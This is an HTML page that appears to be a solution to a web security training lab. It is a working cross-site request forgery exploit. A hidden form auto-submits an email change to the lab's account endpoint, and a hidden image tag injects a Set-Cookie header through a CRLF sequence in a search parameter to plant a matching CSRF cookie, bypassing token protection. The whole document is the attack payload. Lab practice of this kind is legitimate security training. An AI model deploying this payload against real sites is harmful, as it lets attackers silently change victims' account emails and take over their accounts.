<html>
    <body>
        <h1>Hello World!</h1>
        <iframe style="display:none" name="csrf-iframe"></iframe>
        <form action="https://ac151f291fb50bc28036e5bb00f6000b.web-security-academy.net/my-account/change-email" method="post" id="csrf-form" target="csrf-iframe">
            <input type="hidden" name="email" value="test5@test.ca">
            <input type="hidden" name="csrf" value="SXsROOTp3jzq6M5UzIL2KkJIqGpffIQb">
        </form>

        <img style="display:none;" src="https://ac151f291fb50bc28036e5bb00f6000b.web-security-academy.net/?search=hat%0d%0aSet-Cookie:%20csrfKey=ho7GGxMe4EZSrQ8xZ0sBDq2yW0ey9bKH" onerror="document.forms[0].submit()">
    </body>
</html>